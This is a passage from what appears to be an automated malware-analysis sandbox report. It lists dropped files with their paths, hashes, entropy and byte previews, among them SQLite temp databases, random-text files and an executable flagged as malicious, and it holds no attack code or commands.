                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp5F4E.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp6032.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp61A1.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.698304057893793
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp6782.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.695977454005895
                                                        Encrypted:false
                                                        SSDEEP:24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
                                                        MD5:E0510B4427516C1D89AAD3659D680C3D
                                                        SHA1:1992D34F6239D80EB43BA39F3222BF0785E5D1F4
                                                        SHA-256:556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
                                                        SHA-512:35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
                                                        Malicious:false
                                                        Preview:TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

                                                        C:\Users\user\AppData\Local\Temp\tmp686D.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp6A58.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp7A69.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp841C.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.698304057893793
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp870.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp8F3C.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp988D.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp9EB2.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.695977454005895
                                                        Encrypted:false
                                                        SSDEEP:24:IKgDohtDK2f+uqKGOxwiMIvu5zzh18OA1z55/4WN7REhSO3nDD:nOohtDXf+uqKGzDIvuklFNWAOTD
                                                        MD5:E0510B4427516C1D89AAD3659D680C3D
                                                        SHA1:1992D34F6239D80EB43BA39F3222BF0785E5D1F4
                                                        SHA-256:556717E86C1DA818B7B934A7C0BE10B602083FE8D175A040EB6C76EF69C6CB0F
                                                        SHA-512:35D1D63E8DB736901E6172ABB7882F592249616D70532964B60F82A773DFD445DD8331A3E89B4F900D6113004163232079C8B35643CB340D55BDD538D64D20C3
                                                        Malicious:false
                                                        Preview:TTCBKWZYOCCZBQCNYNNHXDSUERYXFEQHAUPIPNXOJQUXOZUDZEESDNCWHKQKNDQEYQACGNCNEFJMPDQMTDJPVAEXHHOLCNYTGMJTCVIZRGZKUZAERPNBENDVAICXLLOLWSIEGMSOEYEIDITHTRHSYYBWCBGPBZQXLYXBONVSVHSPKATRJUTIDHHHEWUAPCUXVYKWDFZLJYPWDNHQQXDDTWGQTEITGNUSHUFDEKVXMDOCYWEDDXBIFFPUULVKKNZYXAWHAGTUWPXRWSZRERALKIOBMKWSCSDSTMSQDLNMFPLUOAYUREBXICBNWWZYLJESRGANWCSMIZSLZVXYJTVFMIAKQZGHQEHOJNMLWHGSJYIBNSENALZOLRFLSQDCESQDSWEENRDLRNAFBRWHQROVDJKSJYRUAEAUHKYFMNTTDVOAGXTQQBYBDWSLMUXLJPZIDYAQCVQSGWFERMOEEFHPZYPJLENLUNZDHRSMRZOQNAHMCELDIYOVIKYOGXSSTFKWXDNSJGHNTYJKHFDJRAPKRESQVWZSOVMVHWYUUTUTFHVIEEAJDKECWXBEPNEBJDJGQAKLKIFWVTFCSQJEQQWEZAAEMTKTRFKJHVCMNUEIUYFUJNEPLTNBFNHMJZWFTXXNGAINRCKZQCBHNNGXETNSEMBCQLYZYFSVGAIEZXYSKPOLBNTAPFYTMYNIMCZXQJRBOFEHSZEICWGOGLTRINBITAMJGQEWIBXYHZVOSHMRHTIQZVQIDGRVKRGFJMSPQFABQRKGFILZUCAATIAKKCHSPEJWYJMANQFJPEQKGZTIZMTAUNTSDOXPEWOYUIPDMYGGMKHEAQDMKRKFZTSQLBNRGRUGHNILPIUZEKJSVPCMPFTMLUVIXQACJDBCPRGCSQCZAKBCFXGQSAIAKPMNXEUWBMREPVHWIPXGNLGHEWWLCXYFMSRGLLZCLMZCBNWZILRHRHVYKJTMMBSIYLVPVJRQPZZTQANLXKYMFTAVKNBL

                                                        C:\Users\user\AppData\Local\Temp\tmpC52C.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpCB41.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpD6E1.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.698304057893793
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpDA61.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpEFE7.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):73728
                                                        Entropy (8bit):1.1874185457069584
                                                        Encrypted:false
                                                        SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                        MD5:72A43D390E478BA9664F03951692D109
                                                        SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                        SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                        SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpF05D.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1026
                                                        Entropy (8bit):4.698618937757839
                                                        Encrypted:false
                                                        SSDEEP:12:9OLMvdtjB4tfcNebo5q78gbSfmGDWic5xFpIhlBKTRQn3JhWbzXEIx52xoTEAU:9O8jmtfwebolhVWtnwTBrnGXnxgak
                                                        MD5:FBFB8162B9366F7135B54193D54C2094
                                                        SHA1:9F7291EB4E117104EE4215B83F38C18607438B02
                                                        SHA-256:D46DB36041F5428D14E2A23B7BDCD936DCD1AE09C398FC5D095C25679B6052DE
                                                        SHA-512:452193D516D505D9D7067AF0132C414A613EFDC264B5D07DF62B06742CFA704925ACAAD18251916DA2DA8957BA2C161F94BAA9CBCF960CB6EC6ACE3397876B01
                                                        Malicious:false
                                                        Preview:IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZ

                                                        C:\Users\user\AppData\Local\Temp\tmpF4CA.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmpF683.tmp

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.792852251086831
                                                        Encrypted:false
                                                        SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                        MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                        SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                        SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                        SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Data\Data.exe

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):373760
                                                        Entropy (8bit):6.1492798216899756
                                                        Encrypted:false
                                                        SSDEEP:6144:5NcrhNqBJrO21xv5yFdg6Nn4WAw6wPCeZpxK:UrhNMB1VMo6x4WAw6wPp
                                                        MD5:C2C0094C2E70379101D9704808838355
                                                        SHA1:9A492AA61C6F36F17B296C075C26EC6C82C0F72D
                                                        SHA-256:3E962DE98112837B963063E4DB6A41ECFE2D50EFC98A5CDF87BCD98FDB1AF145
                                                        SHA-512:D307D318E6B3482C45A158FBF8B567677FCF46696FD8189D114AE71E03A82DC3CD54228E22966D9CF6A782FB4C206BA8B07E495CB13B177103A2AB7A3E3BA3E1
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 49%
